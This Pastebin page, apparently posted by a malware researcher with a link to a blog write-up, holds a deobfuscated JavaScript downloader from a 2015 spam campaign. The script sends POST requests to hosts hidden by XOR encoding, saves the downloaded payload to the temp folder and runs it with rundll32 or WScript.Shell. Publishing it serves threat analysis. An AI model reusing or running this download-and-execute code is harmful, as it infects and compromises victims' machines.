bartblaze

out2.js

Nov 10th, 2015
301
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. Deobfuscated JS file. Related blog post: http://bartblaze.blogspot.com/2015/11/a-quick-look-at-signed-spam-campaign.html
  2.  
  3. kTEIfdmieLe8 = "au0911";
  4.  
  5. function kTEIfdmieLe5(kTEIfdmieLe6) {
  6.     return new ActiveXObject(kTEIfdmieLe6)
  7. };
  8. //// r6JLy1ijVPK
  9. //// 9eoOj
  10.  
  11. //// b81c44zCnlGhKEGFeeq
  12. //// rMgXtx1jVd3fR2
  13. function kTEIfdmieLe(jhmpYYZvkuHWkW) {
  14.     var kTEIfdmieLe4 = '9\x1a\x06f\x277w5T(*#E~###7\x19\x1d\x7f!7\x18#(,hd###2\x1d\x04~;)q?*9, \x0f#861\x0b\x0d}"4\x18/5&J\x198Y\x14\x0b\x14, \x5c\x06HB\x04\x1f\x06\x00\x1dg\x00\x05\x05\x0c=)\x1f\x10\x0bY\x0b\x1d\x0e\x17cB###.\x0d\x02`3/y8?\x276@\x0b;:ip###.\x1d\x09w$.e%5%<!\x1dZ4+7UO###3\x0b\x11s<%c 1\x27,#\x09Z86=UO###\x13, A\x13I]\x16wa'.split("###");
  15. //// U2gGxa
  16. //// v5ziPM5Ffk
  17.     if (jhmpYYZvkuHWkW == "") {
  18.         qKLIFbykNgG = "." + "d" + "l" + "l";
  19.     } else {
  20. //// vuh4k5cITe
  21. //// KGZT1FZBTij1b
  22.         qKLIFbykNgG = "." + "p" + "d" + "f";
  23.     };
  24.     for (var kRIBOVzKPU = 0; kRIBOVzKPU < kTEIfdmieLe4.length; kRIBOVzKPU++) {
  25.         var veHnYKIWjraSp = kTEIfdmieLe5("WScript.Shell");
  26. //// nugznF3J0MgFJS6
  27. //// vAjJP
  28.         sxyPxnzNV = veHnYKIWjraSp.ExpandEnvironmentStrings("%TEMP%") + "\\" + Math.round(1e8 * Math.random()) + qKLIFbykNgG;
  29.         bypLmkq = false;
  30.         kTEIfdmieLe0 = kTEIfdmieLe5("MSXML2.XMLHTTP");
  31.         kTEIfdmieLe0.onreadystatechange = function() {
  32.             if (4 == kTEIfdmieLe0.readyState && 200 == kTEIfdmieLe0.status) {
  33.                 var kTEIfdmieLe1 = kTEIfdmieLe5("ADODB.Stream");
  34.                 if (kTEIfdmieLe1.open(), kTEIfdmieLe1.type = 1, kTEIfdmieLe1.write(kTEIfdmieLe0.ResponseBody), 5e3 < kTEIfdmieLe1.size) {
  35.                     bypLmkq = true;
  36.                     kTEIfdmieLe1.position = 0;
  37.                     kTEIfdmieLe1.saveToFile(sxyPxnzNV, 2);
  38.                     try {
  39.                         if (jhmpYYZvkuHWkW == "") {
  40.                             veHnYKIWjraSp.Exec("rundll32 " + sxyPxnzNV + ", " + "DllRegisterServer");
  41.                         } else {
  42.                             veHnYKIWjraSp.Run(sxyPxnzNV, 1, 0);
  43.                         };
  44.                     } catch (kTEIfdmieLe2) {
  45. //// uLwp7f7a4iYX4fySkVO
  46. //// AHd01oKSom
  47.                        
  48.                     };
  49. //// XEJSIvJ50CMlcrXQ8W
  50. //// l9CA25oIEjMlpDI5
  51.                 }
  52.                 kTEIfdmieLe1.close()
  53.             }
  54. //// vBJw1enjn3Wd7NMI
  55. //// FKMKp9Sj
  56.         };
  57.         try {
  58. //// 7bMQQ7rV
  59. //// 0DHAGjKxwXc0lyCHv
  60. //// KiU13559
  61. //// IaR517JKlqQjx2OsWqJs
  62.             var jjxjYcRoh = 'zXE2rg6lzkenHtwd';
  63.             var ICJCJreUdAoEDtN = kTEIfdmieLe4[kRIBOVzKPU];
  64.             for (var byQIHsqp = "", MCwLh6 = 0, MCwLh7 = 0; MCwLh6 < ICJCJreUdAoEDtN.length; MCwLh6++) byQIHsqp += String.fromCharCode(ICJCJreUdAoEDtN.charCodeAt(MCwLh6) ^ jjxjYcRoh.charCodeAt(MCwLh7)), MCwLh7++, MCwLh7 == jjxjYcRoh.length && (MCwLh7 = 0);
  65.             kTEIfdmieLe7 = "http://" + byQIHsqp + "/redir" + "." + "p" + "h" + "p";
  66.             kTEIfdmieLe0.open("POST", kTEIfdmieLe7, false);
  67.             kTEIfdmieLe0.setRequestHeader("Content-Type", "application/x-www-form-urlencoded");
  68.             kTEIfdmieLe0.send("JreoOoOUJvvFay=" + Math.random() + "&jndj=" + kTEIfdmieLe8 + jhmpYYZvkuHWkW);
  69.         } catch (kTEIfdmieLe3) {
  70.  
  71.         };
  72.  
  73.         if (bypLmkq) {
  74.             break;
  75.         };
  76. //// hqp4kZQUxwE
  77. //// KYrOhQ
  78.     };
  79. };
  80. //// EQr7ksuiuwZdut45a
  81. //// jCStO3r
  82.  
  83. kTEIfdmieLe("");
  84. kTEIfdmieLe("&ncm=sJzHYgdHnDZTwU");
  85. //// AEiSHdZq5
  86. //// nHsVUN2fzi
RAW Paste Data

Adblocker detected! Please consider disabling it...

We've detected AdBlock Plus or some other adblocking software preventing Pastebin.com from fully loading.

We don't have any obnoxious sound, or popup ads, we actively block these annoying types of ads!

Please add Pastebin.com to your ad blocker whitelist or disable your adblocking software.

×